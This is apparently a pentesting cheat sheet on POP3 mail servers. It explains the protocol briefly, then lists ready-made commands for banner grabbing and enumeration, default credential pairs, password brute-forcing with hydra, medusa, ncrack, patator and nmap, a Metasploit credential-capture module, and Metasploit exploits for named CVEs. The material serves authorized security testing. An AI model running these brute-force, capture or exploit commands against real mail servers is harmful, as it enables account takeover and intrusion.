POP3
What is POP3?
POP3 stands for Post Office Protocol. As the name suggests, it allows you to use your email inbox like a post office – emails are downloaded onto your computer and removed from the mail server.When accessing your emails using the POP3 protocol, a copy of the emails is created and stored locally on your computer. The originals are usually, but not always, removed from the mail server. In other words, emails are tied to the specific device. Once the email is downloaded onto one device (and removed from the mail server), it cannot be accessed by another email client or device.
| 1 2 | PORT STATE SERVICE VERSION 110/tcp open pop3 Zimbra Collabration Suite pop3d |
POP3 Pentesting
|
|---|
| port:110, 995 |
Enumeration
Banner Grabbing
| 1 2 3 4 5 6 | telnet 10.10.x.x 110 nc -nv 10.10.x.x 110 nmap -p110 --script=banner 10.10.x.x nmap -p110 --script=pop3-ntlm-info 10.10.x.x msf > use auxiliary/scanner/pop3/pop3_version #MetasploitFramework openssl s_client -connect <IP>:995 -crlf -quiet |
Capabilities
| 1 2 3 4 | #All are default scripts nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port 110 192.168.x.x # Retrieve POP3 server capabilities (CAPA, TOP, USER, SASL, RESP-CODES, LOGIN-DELAY, PIPELINING, EXPIRE, UIDL, IMPLEMENTATION) nmap -v -sV --version-intensity=5 --script pop3-capabilities -p T:110 192.168.x.x |
The pop3-ntlm-info plugin will return some “sensitive” data (Windows versions).
POP3 Commands
| 1 2 3 4 5 6 7 8 9 10 11 | POP commands: USER uid Log in as "uid" PASS password Substitue "password" for your actual password STAT List number of messages, total mailbox size LIST List messages and sizes RETR n Show message n DELE n Mark message n for deletion RSET Undo any changes QUIT Logout (expunges messages if no RSET) TOP msg n Show first n lines of message number msg CAPA Get capabilities |
Capturing POP3 Packages
| 1 | msf > use auxiliary/server/capture/pop3 #MetasploitFramework |
POP3 Credentials
Authentication Checking (classical credentials)
| USER | PASS |
|---|---|
| admin | admin |
| root | root |
| root | toor |
Brute Forcing
| 1 2 3 4 5 6 7 8 9 10 11 12 | hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V hydra -t 2 -L users.list -P passwords.list -M 10.10.x.x.list -s 110 pop3 # Try to bruteforce POP3 accounts Nmap: pop3-brute –script-args userdb=users.list,passdb=passwords.list nmap --script pop3-brute --script-args pop3loginmethod=SASL-LOGIN -p T:110 IP nmap --script pop3-brute --script-args pop3loginmethod=SASL-CRAM-MD5 -p T:110 IP nmap --script pop3-brute --script-args pop3loginmethod=APOP -p T:110 IP msf > use auxiliary/scanner/pop3/pop3_login #MetasploitFramework medusa -t 2 -T 2 -U users.list -P passwords.list -H 10.10.x.x.list -n 110 -M pop3 ncrack -g CL=2 -U users.list -P passwords.list -iL 10.10.x.x.list -p pop3:110 -oA output patator pop3_login host=10.10.x.x user=FILE1 password=FILE0 0=users.list 1=passwords.list -x ignore:fgrep=’incorrect password or account name’ |
POP3 Vulnerabilities
| 1 2 3 4 5 | #Seattle Lab Mail 5.5 [CVE-2003-0264] msf > use exploit/windows/pop3/seattlelab_pass #MetasploitFramework Exploit-DB: 638.py, 643.c, 646.c #Cyrus – Gentoo 2006.0 Linux 2.6 [CVE-2006-2502] msf > use exploit/linux/pop3/cyrus_pop3d_popsubfolders #MetasploitFramework |
Reference: https://secybr.com/posts/pop3-pentesting-best-practices/
